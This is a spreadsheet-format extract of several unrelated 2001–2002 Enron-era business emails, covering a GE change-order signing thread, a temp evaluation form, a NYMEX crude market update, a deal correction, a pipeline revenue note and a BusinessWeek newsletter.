	From:  Ben F Jacoby @ ECT                           05/02/2001 11:47 AM_x000D_
	_x000D_
_x000D_
Sent by: Ben Jacoby@ECT_x000D_
To: Rebecca Walker/NA/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: RE: FW: Blue Dog Max - COs 1 and 2  _x000D_
_x000D_
Kay already has executed fax copies. Does GF need originals? Usually fax _x000D_
copies suffice..._x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Rebecca Walker @ ENRON                           05/02/2001 10:23 AM_x000D_
	_x000D_
_x000D_
To: Ben Jacoby/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: RE: FW: Blue Dog Max - COs 1 and 2_x000D_
_x000D_
Ben _x000D_
_x000D_
Please let me know when you get the copies of the change order.  I need to _x000D_
give executed copies to Global Finance and accounting in order to pay the c/o _x000D_
# 2 invoice._x000D_
_x000D_
Thanks,_x000D_
Rebecca_x000D_
---------------------- Forwarded by Rebecca Walker/NA/Enron on 05/02/2001 _x000D_
10:22 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Ben F Jacoby @ ECT                           05/02/2001 08:34 AM_x000D_
	_x000D_
_x000D_
Sent by: Ben Jacoby@ECT_x000D_
To: jeffrey.darst@ps.ge.com @ ENRON_x000D_
cc: Chris Booth/NA/Enron@Enron, Rebecca Walker/NA/Enron@Enron, Kay _x000D_
Mann/Corp/Enron@Enron _x000D_
_x000D_
Subject: RE: FW: Blue Dog Max - COs 1 and 2  _x000D_
_x000D_
Jeff:_x000D_
_x000D_
That would be fine. Please send to my attention at EB3150a. _x000D_
_x000D_
Ben_x000D_
_x000D_
_x000D_
_x000D_
jeffrey.darst@ps.ge.com on 05/02/2001 07:45:24 AM_x000D_
To: Ben.F.Jacoby@enron.com_x000D_
cc: chris.booth@enron.com, chase.clark@ps.ge.com, john.schroeder@ps.ge.com, _x000D_
Chris.Booth@enron.com, Kay.Mann@enron.com _x000D_
Subject: RE: FW: Blue Dog Max - COs 1 and 2_x000D_
_x000D_
Ben,_x000D_
_x000D_
Please let me know how you would like to complete this process.  Would you_x000D_
like me to send you two original signed copies, and then you could return_x000D_
one with your signature?_x000D_
_x000D_
Please advise,_x000D_
_x000D_
&gt; Jeff_x000D_
&gt; Global Power Plant Systems_x000D_
&gt; 518-385-0663_x000D_
&gt; 518-381-1513 (fax)_x000D_
&gt; _x000D_
&gt; _x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Ben.F.Jacoby@enron.com [mailto:Ben.F.Jacoby@enron.com]_x000D_
Sent: Tuesday, April 24, 2001 7:40 PM_x000D_
To: Darst, Jeffrey A (PS, PPSD)_x000D_
Cc: chris.booth@enron.com; Chase, Clark (PS, Contractor, PPSD);_x000D_
Schroeder, John H Jr (PS, Sales); Chris.Booth@enron.com;_x000D_
Kay.Mann@enron.com_x000D_
Subject: RE: FW: Blue Dog Max - COs 1 and 2_x000D_
_x000D_
_x000D_
_x000D_
Jeff:_x000D_
_x000D_
Attached is the most recent version (I think version 8) of CO #1 which we_x000D_
understood had been approved both by GE and ENA. I hope this clears up our_x000D_
misunderstanding._x000D_
_x000D_
With respect to CO#2, we have incorporated your final changes. Please find_x000D_
attached a marked and clean (i.e. executable) copy. At your earliest_x000D_
convenience, please sign the clean copy where indicated, and scan and_x000D_
e-mail me the signed copy._x000D_
_x000D_
I will call you first thing in the morning._x000D_
_x000D_
Regards,_x000D_
_x000D_
Ben_x000D_
_x000D_
_x000D_
_x000D_
(See attached file: CO#1-R8.doc)(See attached file: Final CO#2 (clean).doc)_x000D_
(See attached file: Final CO#2 (marked).doc)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Jun 2001 08:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.george@enron.com', 'elizabeth.sager@enron.com', 'barton.clark@enron.com'})</t>
  </si>
  <si>
    <t>Comments Needed-Lavon Wilson for Brenda Whitehead's old desk 6/1</t>
  </si>
  <si>
    <t>Your comments are needed for Lavon Wilson who sat in for Brenda Whitehead's _x000D_
old desk until a replacement was found.  Please return as soon as possible.  _x000D_
Thank you!-Becky_x000D_
  _x000D_
 Excellent = 5       Above Average = 4      Average = 3            Below _x000D_
Average = 2            Poor = 1_x000D_
_x000D_
 Initiative_x000D_
_x000D_
 Cooperation_x000D_
_x000D_
 Punctuality_x000D_
_x000D_
 Attendance_x000D_
_x000D_
 Quality of Work_x000D_
_x000D_
 Would you request this person again Y/N?_x000D_
_x000D_
Comments:</t>
  </si>
  <si>
    <t>Fri, 1 Feb 2002 06:51:06 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'edward.kevelson@americas.bnpparibas.com'})</t>
  </si>
  <si>
    <t>frozenset({'ekevelson@aol.com'})</t>
  </si>
  <si>
    <t>BNP Paribas NYMEX Floor AM Update</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Well, Thursday turned into quite a "corker" when for most of the day it looked_x000D_
like nothing would happen. A late run up on products expiry caught the market_x000D_
off guard and we were able to settle back above the $19.40 mark, which seems now_x000D_
very unimportant. Believe it or not, we're still in a range, albeit a choppy and_x000D_
volatile one. Incremental fund positions are getting chopped up. The Access_x000D_
after market was extremely active and volatile on news reports of a natural gas_x000D_
pipeline explosion near the Kuwait/Iraq border. We ran up to $20.03 before the_x000D_
hysteria died down. We then sold back off to $19.09!! In the light of calm, both_x000D_
are seen as overreactions and we should come in right around unchanged for spot_x000D_
crude. The worry over the pipeline story wasn't necessarily on a supply_x000D_
disruption, but the cause of teh explosion. Its proximity to the Iraqi border_x000D_
raised more wide ranging issues. Heat spreads saw a solid jump up, Mar/Apr into_x000D_
-10, Apr/May -15, May/June -40. All extended momentum, whether up or down,_x000D_
appears to have waned. Summer gas cracks are holding on in front of $7.00,_x000D_
another sign that the downward momentum isn't there right now. OPEC comments_x000D_
that they would cut production if "other" producers flooded the market (i.ie._x000D_
Russia) and a (so far) failed threatened strike by refinery workers in the US_x000D_
Gulf Coast are also causing some volatility. Good luck today._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
______________________________________________________________________________________________________________________________________x000D_
_x000D_
Ce message et toutes les pieces jointes (ci-apres le "message") sont etablis a l'intention exclusive de ses destinataires et sont confidentiels. Si vous recevez ce message par erreur, merci de le detruire et d'en avertir immediatement l'expediteur._x000D_
_x000D_
Toute utilisation de ce message non conforme a sa destination, toute diffusion ou toute publication, totale ou partielle, est interdite, sauf autorisation expresse._x000D_
_x000D_
L'internet ne permettant pas d'assurer l'integrite de ce message, BNP PARIBAS (et ses filiales) decline(nt) toute responsabilite au titre de ce message, dans l'hypothese ou il aurait ete modifie._x000D_
	----------------------------------------------------------------------------------_x000D_
This message and any attachments (the "message") are intended solely for the addressees and are confidential. If you receive this message in error, please delete it and immediately notify the sender._x000D_
_x000D_
Any use not in accord with its purpose, any dissemination or disclosure, either whole or partial, is prohibited except formal approval._x000D_
_x000D_
The internet can not guarantee the integrity of this message. BNP PARIBAS (and its subsidiaries) shall (will) not therefore be liable for the message if modified._x000D_
_____________________________________________________________________________________________________________________________________</t>
  </si>
  <si>
    <t>Fri, 16 Feb 2001 07:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Duke deal #525523</t>
  </si>
  <si>
    <t xml:space="preserve">It's CAISO energy - and I've changed it. I guess some kinks are there to _x000D_
stay, huh? I will have a great weekend, thanks - I'm actually having a _x000D_
housewarming party at my new house! You have fun too!_x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kimberly Hundl@ENRON_x000D_
02/16/2001 03:47 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Duke deal #525523_x000D_
_x000D_
Hi Kate,_x000D_
This deal has an NP-15 delivery point with firm energy.  Which is correct? _x000D_
Have a great weekend!_x000D_
Thanks!_x000D_
Kim_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 12:02:49 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: TW PNR Revenue thru November 13th</t>
  </si>
  <si>
    <t>Jan, FYI, Kim._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Harris, Steven  _x000D_
Sent:	Wednesday, November 14, 2001 1:50 PM_x000D_
To:	Lohman, TK; Watson, Kimberly_x000D_
Subject:	RE: TW PNR Revenue thru November 13th_x000D_
_x000D_
Oh yeah!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lohman, TK  _x000D_
Sent:	Wednesday, November 14, 2001 12:54 PM_x000D_
To:	Watson, Kimberly; Harris, Steven_x000D_
Subject:	FW: TW PNR Revenue thru November 13th_x000D_
_x000D_
Doing everything I can to get a bit of a boost this month!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Bodnar, Michael  _x000D_
Sent:	Wednesday, November 14, 2001 9:06 AM_x000D_
To:	Moore, Jan; Mulligan, Amy; Hanagriff, Richard_x000D_
Cc:	Lohman, TK; Blair, Lynn; Kowalke, Terry; Schoolcraft, Darrell_x000D_
Subject:	TW PNR Revenue thru November 13th_x000D_
_x000D_
On November 8th, Calpine parked 22,500 at Southpoint and scheduled the gas off TW on November 13th. The posted rate for Southpoint for that time period was the max rate of $0.3883/Dth _x000D_
_x000D_
Buyer			PO #	POI	 Dekatherm 	 Rate/Dth 	  Invoice Amount to Date _x000D_
Calpine Energy 		27507	78151	 22,500 	 	$0.3883 		 $43,683.75_x000D_
_x000D_
If you have any questions, please call me.</t>
  </si>
  <si>
    <t>Fri, 16 Nov 2001 22:07:01 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'insider@newsletters.businessweek.com'})</t>
  </si>
  <si>
    <t>November 16 edition</t>
  </si>
  <si>
    <t xml:space="preserve">Register/Subscribe &lt;http://www.businessweek.com/register.htm&gt;_x000D_
Home &lt;http://www.businessweek.com/index.html&gt;_x000D_
	Get your PeopleSoft 8 CRM Info Kit Today._x000D_
_x000D_
PeopleSoft 8 CRM is the ONLY internet solution that takes your customer_x000D_
relationship management to a new level. Integrate your customer-facing_x000D_
activities with your critical business applications and manage your_x000D_
customer life cycle -- from prospect to profit. To receive your free_x000D_
PeopleSoft 8 CRM Information Kit and Demo CD, visit_x000D_
www.peoplesoft.com/go/crminfokit9 &lt;http://newsletters.businessweek.com/GoNow/a14109a46672a62891961a1&gt; today._x000D_
	_x000D_
       Search_x000D_
 THE SITE  BW Magazine  Daily Briefing  e.biz  Small Business  B-Schools  ----------------  Past Issues -&gt;  Advanced Search -&gt;    	_x000D_
 &lt;http://www.businessweek.com/index.html&gt; _x000D_
  &lt;http://www.businessweek.com/common_images/bw_channels.gif&gt;_x000D_
  &lt;http://www.businessweek.com/common_images/bw_1x1.gif&gt;	FRIDAY, NOVEMBER 16, 2001 		_x000D_
CONTENTS_x000D_
_x000D_
Cover Stories_x000D_
Daily Briefing_x000D_
Investing_x000D_
Global Business_x000D_
Technology_x000D_
Small Biz_x000D_
B-Schools_x000D_
Careers_x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_cha3.gif&gt;_x000D_
	  &lt;http://www.businessweek.com/common_images/bw_1x1.gif&gt;	  &lt;http://www.businessweek.com/common_images/ne_insider.gif&gt;_x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_1x1.gif&gt;	 This Week &lt;http://www.businessweek.com/common_images/bw_thisweek.gif&gt;_x000D_
_x000D_
_x000D_
 November 26 Table of Contents  &lt;http://www.businessweek.com/contents.htm&gt;_x000D_
_x000D_
	_x000D_
COVER STORY_x000D_
*CONFUSED ABOUT EARNINGS? &lt;http://www.businessweek.com/magazine/content/01_48/b3759001.htm?c=bwinsidernov16&amp;n=link1&amp;t=email&gt;_x000D_
There are no rules for calculating operating earnings--the number investors watch--as there are for net profits, which are filed with the SEC. So companies are making up their own rules about what to add and what to leave out, and calling the result "earnings." That makes it impossible for investors to compare companies and threatens the credibility of the U.S. financial system. Here's what should be done--and what investors need to know._x000D_
_x000D_
*Available to all readers &lt;http://www.businessweek.com/magazine/content/01_48/b3759001.htm?c=bwinsidernov16&amp;n=link1&amp;t=email&gt; after Monday,_x000D_
November 19_x000D_
_x000D_
SPECIAL REPORT_x000D_
THE INFO TECH 100* &lt;http://www.businessweek.com/magazine/toc/01_48/B3759it100_2.htm?c=bwinsidernov16&amp;n=link2&amp;t=email&gt;_x000D_
In the past six months, the stocks of four-fifths of the BusinessWeek Info Tech 100 declined in value. But a few still shine despite tough times._x000D_
_x000D_
Available to all readers &lt;http://www.businessweek.com/magazine/toc/01_48/B3759it100_2.htm?c=bwinsidernov16&amp;n=link2&amp;t=email&gt; _x000D_
_x000D_
Plus:_x000D_
INTERACTIVE SCOREBOARD** &lt;http://www.businessweek.com/magazine/toc/01_48/B3759it100_2.htm?c=bwinsidernov16&amp;n=link3&amp;t=email&gt;_x000D_
Expanded online to include the 200 best IT companies, with a wealth of financial data_x000D_
_x000D_
**This, plus many more stories in this Special Report, are available for all readers on Thursday night, Nov. 15_x000D_
_x000D_
THE CORPORATION:_x000D_
*ALL EYES ON THE ENRON PRIZE &lt;http://www.businessweek.com/magazine/content/01_48/b3759104.htm?c=bwinsidernov16&amp;n=link4&amp;t=email&gt;_x000D_
Dynegy's deal for the troubled power company could yield billions _x000D_
_x000D_
Available to all readers &lt;http://www.businessweek.com/magazine/content/01_48/b3759104.htm?c=bwinsidernov16&amp;n=link4&amp;t=email&gt; after Monday,_x000D_
November 19_x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_rule.gif&gt;_x000D_
**Remember, only subscribers can see the entire issue. Selected stories are available to nonsubscribers on Monday. Want to become a subscriber? It's so easy, all you have to do to get started is go to &lt;http://www.businessweek.com/register.htm?c=bwinsidernov16&amp;n=link5&amp;t=email&gt; _x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_rule.gif&gt;_x000D_
SEARCH PAST ISSUES OF BW_x000D_
Free for subscribers only &lt;http://www.businessweek.com/search/index.html?c=bwinsidernov16&amp;n=link6&amp;t=email&gt; -- FIVE YEARS of Business Week magazine._x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_rule.gif&gt;_x000D_
BONUS: THE BW 50_x000D_
The 50 best companies &lt;http://www.businessweek.com/bw50/?c=bwinsidernov16&amp;n=link7&amp;t=email&gt; in the S&amp;P 500. Plus: In-depth info on all 500,_x000D_
extra stories, interactive scoreboards, videos, tools, and more --_x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_rule.gif&gt;_x000D_
Here are BW Online highlights from this week:_x000D_
_x000D_
DAILY BRIEFING _x000D_
_x000D_
11/15 -- NEWS ANALYSIS _x000D_
JDS Uniphase: Ready for an Encore? &lt;http://www.businessweek.com/bwdaily/dnflash/nov2001/nf20011115_9858.htm?c=bwinsidernov16&amp;n=link9&amp;t=email&gt; _x000D_
As the curtain descends on a dismal year, some investors see the leader in optical telecom equipment as a star with comeback potential _x000D_
_x000D_
11/15 -- NEWSMAKER Q&amp;A_x000D_
JDS's Straus: Banking on Broadband &lt;http://www.businessweek.com/bwdaily/dnflash/nov2001/nf20011115_4626.htm?c=bwinsidernov16&amp;n=link10&amp;t=email&gt; _x000D_
Says the CEO about high-speed access: "Applications and business models that allow somebody to make money will bring growth" _x000D_
_x000D_
11/15 -- STREET WISE_x000D_
Suddenly, a Chillier Season for Oil Shares &lt;http://www.businessweek.com/bwdaily/dnflash/nov2001/nf20011115_1868.htm?c=bwinsidernov16&amp;n=link11&amp;t=email&gt; _x000D_
Turmoil over production quotas could keep supplies high. Good news for consumers -- and maybe even for investors, of the long-term variety _x000D_
_x000D_
11/15 -- NEWS ANALYSIS_x000D_
A Hard Slog for Financial "Special Forces" &lt;http://www.businessweek.com/bwdaily/dnflash/nov2001/nf20011115_1679.htm?c=bwinsidernov16&amp;n=link12&amp;t=email&gt; _x000D_
Treasury's money warriors are fighting an uphill battle as they target the clandestine conduits that funnel cash to terrorists_x000D_
_x000D_
11/14 -- INSIDE WALL STREET ONLINE_x000D_
Holiday Bargain-Hunting on the Street &lt;http://www.businessweek.com/bwdaily/dnflash/nov2001/nf20011113_2386.htm?c=bwinsidernov16&amp;n=link12&amp;t=email&gt; _x000D_
It's that time of year when one investor's loser is another's steal. Here are some big names that could become stocking stuffers _x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_rule.gif&gt;_x000D_
_x000D_
SPEND SOME QUALITY TIME WITH YOUR MONEY_x000D_
Watch BusinessWeek TV &lt;http://www.businessweek.com/bwtv/?c=bwinsidernov16&amp;n=link14&amp;t=email&gt;, a weekly personal finance_x000D_
program that follows money from Wall Street to_x000D_
Main Street: Making it, investing it, and even_x000D_
spending it._x000D_
Check your local listings for station and exact time. _x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_rule.gif&gt;_x000D_
INVESTING _x000D_
_x000D_
11/15 -- MARKET SNAPSHOT_x000D_
Blue Chips Pocket Gains &lt;http://www.businessweek.com/investor/content/nov2001/pi20011115_8908.htm?c=bwinsidernov16&amp;n=link16&amp;t=email&gt; _x000D_
Hope for an economic recovery in 2002 continues to buoy stocks, but ugly news from Dell and Yahoo may stall performance Friday _x000D_
_x000D_
11/15 -- FUND Q&amp;A_x000D_
High Quality Munis Bring Solid Returns &lt;http://www.businessweek.com/investor/content/nov2001/pi20011115_3407.htm?c=bwinsidernov16&amp;n=link17&amp;t=email&gt; _x000D_
Christine Thompson has outperformed her peers by making smart bets in the hospital and health care sectors and concentrating on high quality issues _x000D_
_x000D_
11/12 -- ASK THE ANALYST_x000D_
Fund Selections &lt;http://www.businessweek.com/mediacenter/list/ask01.htm?/mediacenter/ram/asktheanalyst/pedwards110901.htm?c=bwinsidernov16&amp;n=link18&amp;t=email&gt; _x000D_
S&amp;P's Phil Edwards answers your questions on bond funds. Can they continue their winning streak? _x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_rule.gif&gt;_x000D_
GLOBAL BUSINESS _x000D_
_x000D_
INTERNATIONAL -- EUROPE'S FUTURE_x000D_
Germany's Challenge &lt;http://www.businessweek.com/magazine/content/01_47/b3758601.htm?c=bwinsidernov16&amp;n=link21&amp;t=email&gt; _x000D_
Can Europe's top economy lead the Continent to reform? _x000D_
_x000D_
11/12 -- ONLINE ASIA_x000D_
Not So Fab for a Singapore Chipmaker &lt;http://www.businessweek.com/bwdaily/dnflash/nov2001/nf20011112_2873.htm?c=bwinsidernov16&amp;n=link22&amp;t=email&gt; _x000D_
Chartered Semiconductor CFO Chia Song Hwee gamely maintains that hard times and ferocious competition haven't changed its game plan _x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_rule.gif&gt;_x000D_
TECHNOLOGY _x000D_
_x000D_
11/19 -- TECHNOLOGY &amp; YOU_x000D_
A Light Laptop That's Fully Loaded &lt;http://www.businessweek.com/magazine/content/01_47/b3758029.htm?c=bwinsidernov16&amp;n=link27&amp;t=email&gt; _x000D_
Toshiba's Port?g? 4000 may be the first compact notebook that doesn't skimp on features _x000D_
11/15 -- PRIVACY MATTERS_x000D_
Face It, Face-Cams Are Here to Stay &lt;http://www.businessweek.com/bwdaily/dnflash/nov2001/nf20011115_3919.htm?c=bwinsidernov16&amp;n=link25&amp;t=email&gt; _x000D_
Rather than trying to prevent their adoption, privacy advocates would be better served trying to define restrictive guidelines on their use _x000D_
_x000D_
11/14 -- BYTE OF THE APPLE _x000D_
Office X: The Best and Worst of Microsoft &lt;http://www.businessweek.com/bwdaily/dnflash/nov2001/nf20011114_5582.htm?c=bwinsidernov16&amp;n=link26&amp;t=email&gt; _x000D_
The OS X version of Office is a ringing endorsement of the Mac. Too bad it breaks no new ground and costs so much _x000D_
_x000D_
Plus, you'll find daily coverage of the rapidly changing world of e-business at &lt;http://www.ebiz.businessweek.com?c=bwinsidernov16&amp;n=link28&amp;t=email&gt; BW e.biz offers exclusive analysis, commentary, and Web-site reviews every day. Visit often!_x000D_
_x000D_
_x000D_
_x000D_
UPCOMING CONFERENCES: &lt;http://www.ebiz.businessweek.com?c=bwinsidernov16&amp;n=link33&amp;t=email&gt;_x000D_
BusinessWeek in partnership with Hewlett-Packard presents:_x000D_
The Sixth Annual BusinessWeek Conference on the Digital Economy,_x000D_
New Priorities: Building a Collaborative Enterprise in Uncertain Times_x000D_
December 6-7, 2001_x000D_
The Fairmont Hotel, San Francisco, California_x000D_
_x000D_
We are pleased to announce our keynote speakers are:_x000D_
_x000D_
Jack Welch &lt;http://www.businessweek.com/insider/jwelch.htm&gt;, Former Chairman and CEO of General Electric Company and_x000D_
The Honorable James A. Baker, III, Former U.S. Secretary of State (1989-1992)_x000D_
and Former U.S. Secretary of the Treasury (1985-1988)_x000D_
_x000D_
In light of recent events in New York and Washington D.C., the_x000D_
conference will feature a special session on Digital Security: _x000D_
Job #1 in Threatening Times._x000D_
Raymond Kelly, Former NYPD Commissioner; Senior Managing Director, _x000D_
Global Security, Bear Stearns will head up the panel_x000D_
_x000D_
Additional Speakers include:_x000D_
	_x000D_
 	 _x000D_
Michael Aguilar	  	 President and COO	  	 Panasonic Company National	 _x000D_
Marc Andreessen	  	 Chairman and Cofounder	  	 Loudcloud	 _x000D_
Bill Bass	  	 SVP, E-Commerce and International	  	 Lands' End, Inc.	 _x000D_
Joseph Baylock	  	 Group Vice President	  	 Gartner, Inc.	 _x000D_
Daeje Chin	  	 President and CEO, Digital Media System Business	  	 Samsung Electronics Co., Ltd.	 _x000D_
Bruce Chizen	  	 President and CEO	  	 Adobe	 _x000D_
Eric K. Clemons	  	 Professor of Information, Strategy, and Economics	  	 The Wharton School, University of Pennsylvania	 _x000D_
Lisa J. Colnett	  	 SVP, Worldwide Process Management and CIO	  	 Celestica Inc.	 _x000D_
Craig Conway	  	 President and CEO	  	 PeopleSoft, Inc.	 _x000D_
Richard A. DeMillo	  	 Vice President and CTO	  	 Hewlett-Packard Company	 _x000D_
James Hamilton	  	 President	  	 Efficient Networks Inc. (a subsidiary of Siemens ICN)	 _x000D_
James E. Heppleman	  	 CTO and EVP	  	 Software Products, PTC	 _x000D_
Konrad Hilbers	  	 CEO	  	 Napster, Inc.	 _x000D_
David House	  	 President, CEO, and Chairman	  	 Allegro Networks.	 _x000D_
John Jordan	  	 Principal	  	 Cap Gemini Ernst &amp; Young	 _x000D_
Raymond C. Kurzweil	  	 Author	  	 The Age of Spiritual Machines	 _x000D_
David O. Leemon	  	 EVP and CSO	  	 Charles Schwab Corporation	 _x000D_
Elias Levy	  	 Co-Founder and CTO	  	 Security Focus	 _x000D_
Webb McKinney	  	 Business Customer Organization President	  	 and HP-Compaq Merger Integration Manager	  	 Hewlett-Packard Co.	 _x000D_
Mike Micucci	  	 Vice President, Solutions Strategy	  	 Commerce One	 _x000D_
Lars Nyberg	  	 Chairman and CEO	  	 NCR Corporation	 _x000D_
Robert W. Shaner	  	 President, Wireless Operations	  	 Cingular Wireless	 _x000D_
Pradeep Sindhu	  	 Vice Chairman and CTO	  	 Juniper Networks, Inc.	  	 _x000D_
Carl Yankowski	  	 CEO	  	 Palm, Inc.	  	 _x000D_
_x000D_
Special Dinner Entertainment by Martin Short and ?The Second City? Comedy Improv Group_x000D_
_x000D_
For a complete listing of speakers, full program details or to register go to_x000D_
&lt;http://www.conferences.businessweek.com/2001/digital2001/?c=bwinsidernov16&amp;n=link29&amp;t=email&gt;_x000D_
	_x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_rule.gif&gt;_x000D_
SMALL BUSINESS ONLINE _x000D_
_x000D_
11/19 -- FINANCE_x000D_
Insurance: The Coverage Crunch &lt;http://www.businessweek.com/magazine/content/01_47/b3758098.htm?c=bwinsidernov16&amp;n=link31&amp;t=email&gt; _x000D_
Providers are spreading premium hikes far and wide. That could doom some small companies _x000D_
_x000D_
11/12 -- SMART ANSWERS_x000D_
Networking's Human Connection &lt;http://www.businessweek.com/smallbiz/content/nov2001/sb20011112_0590.htm?c=bwinsidernov16&amp;n=link32&amp;t=email&gt; _x000D_
To build a list of business contacts, do the research, compose the pitches, make the lunch dates -- and then listen _x000D_
_x000D_
11/5 -- VENTURE CAPITAL_x000D_
VCs Remain in Low Gear &lt;http://www.businessweek.com/smallbiz/content/nov2001/sb20011112_1130.htm?c=bwinsidernov16&amp;n=link33&amp;t=email&gt; _x000D_
Downturns usually mean opportunities, but depressed tech spending and a sluggish market are keeping venture capitalists on the sidelines _x000D_
_x000D_
FORUMS_x000D_
Small Business Forum &lt;http://www.businessweek.com/smallbiz/content/oct2001/sb20011012_810.htm?c=bwinsidernov16&amp;n=link35&amp;t=email&gt; _x000D_
Join the discussion? A reader outlines how factoring your receivables can be a great way to increase cash flow. What do you think? Check out the Financing Your Business folder _x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_rule.gif&gt;_x000D_
B-SCHOOLS _x000D_
_x000D_
11/15 -- MBA JOURNALS_x000D_
Learning in the Real World Classroom &lt;http://www.businessweek.com/bschools/mbajournal/index.htm?c=bwinsidernov16&amp;n=link37&amp;t=email&gt; _x000D_
If you want to know what business school is like, whom better to ask than MBA students? _x000D_
_x000D_
CAREER MOVES_x000D_
EMBA Profiles &amp; Rankings &lt;http://www.businessweek.com/bschools/01/emba_rank.htm?c=bwinsidernov16&amp;n=link39&amp;t=email&gt; _x000D_
BusinessWeek's first Executive MBA rankings in a decade grade 35 programs worldwide. The 2001 rankings are based on surveys of over 3,000 graduates of 82 B-schools, as well as a poll of EMBA directors at those 82 schools. Scan 161 profiles of EMBA programs to determine which is right for you _x000D_
_x000D_
B-SCHOOL CALENDAR_x000D_
BusinessWeek Online's New Tool &lt;http://bwnt.businessweek.com/calendar/?c=bwinsidernov16&amp;n=link40&amp;t=email&gt; will give you an idea of upcoming events at B-schools in the U.S. and around the world _x000D_
_x000D_
MBA JOURNALS_x000D_
Preparing for B-School &lt;http://www.businessweek.com/bschools/mbajournal/index.htm?c=bwinsidernov16&amp;n=link41&amp;t=email&gt; _x000D_
In this new series, 11 first-year students discuss the B-school orientation process _x000D_
_x000D_
B-SCHOOL FORUMS_x000D_
Join Today! &lt;http://forums.businessweek.com/bw-bschools/start?c=bwinsidernov16&amp;n=link42&amp;t=email&gt; _x000D_
Visit BW Online's interactive forums for wide-ranging discussions about management education. Search through OVER 228,000 POSTS for topics that interest you _x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_rule.gif&gt;_x000D_
CAREERS _x000D_
_x000D_
11/15 -- PAY &amp; PERKS_x000D_
The CEO Gravy Train Just Got Derailed  &lt;http://www.businessweek.com/magazine/content/01_47/b3758095.htm?c=bwinsidernov16&amp;n=link44&amp;t=email&gt;_x000D_
Sorry, chiefs--"pay for performance" is back in vogue _x000D_
_x000D_
11/08 -- ASK CAREERS_x000D_
The Gift of Tongues Keeps on Giving &lt;http://www.businessweek.com/careers/content/nov2001/ca2001118_3934.htm?c=bwinsidernov16&amp;n=link45&amp;t=email&gt; _x000D_
Fluency in a second language commands a premium on the job market. How one goes about acquiring it depends on what best suits the individual _x000D_
_x000D_
ASK CAREERS_x000D_
Have a question about your career or workplace issues? E-mail us at: askcareers@businessweek.com &lt;mailto:askcareers@businessweek.com?c=bwinsidernov16&amp;n=link53&amp;t=email&gt;_x000D_
Please include your real name and phone number in case we need more information. If we answer your question, only your initials and city will be printed._x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_rule.gif&gt;_x000D_
SEARCH BUSINESSWEEK.COM_x000D_
_x000D_
Search our ENTIRE SITE &lt;http://www.businessweek.com/search/index.html?c=bwinsidernov16&amp;n=link54&amp;t=email&gt; for all free content, including Daily Briefing, BW e.biz, Small Business, and the Best B-Schools. You'll find our search function in the light-blue bar at the top of nearly every screen on the site_x000D_
_x000D_
See you online,_x000D_
Joleen M. Colpa_x000D_
BW Online_x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_rule.gif&gt;_x000D_
_x000D_
_x000D_
The Insider Newsletter is a FREE service provided by BusinessWeek Online. _x000D_
If you've received this message in error or if you would like to change or cancel your newsletter subscription, please go to our Click here to change or remove your subscription. &lt;http://newsletters.businessweek.com/Change-Remove/a14109a62891961a2a46672&gt;   &lt;http://newsletters.businessweek.com/Sense-HTML/a14109a62891961a46672&gt;page. _x000D_
If you need other assistance, please contact Customer Service &lt;http://www.businessweek.com/custserv/contactserv.htm?c=bwinsidernov16&amp;n=link47&amp;t=email&gt;. 	_x000D_
  &lt;http://www.businessweek.com/common_images/bw_1x1.gif&gt;	              _x000D_
  &lt;http://www.businessweek.com/common_images/bw_1x1.gif&gt;_x000D_
	_x000D_
  &lt;http://www.businessweek.com/common_images/bw_1x1.gif&gt;	  &lt;http://www.businessweek.com/common_images/bw_1x1.gif&gt;_x000D_
	  &lt;http://www.businessweek.com/common_images/bw_1x1.gif&gt;_x000D_
_x000D_
 Get 4 Free Issues of BusinessWeek Magazine &lt;http://www.businessweek.com/common_images/offers/bw_suboffer.gif&gt;_x000D_
Fill in this form to receive your four free issues:_x000D_
	_x000D_
Name:_x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_1x1.gif&gt;	_x000D_
E-Mail Address:_x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_1x1.gif&gt;	_x000D_
Street Address:_x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_1x1.gif&gt;	_x000D_
City:_x000D_
_x000D_
  &lt;http://www.businessweek.com/common_images/bw_1x1.gif&gt;	_x000D_
State:_x000D_
	 Zip:_x000D_
 	_x000D_
Country:_x000D_
_x000D_
	_x000D_
_x000D_
	_x000D_
_x000D_
_x000D_
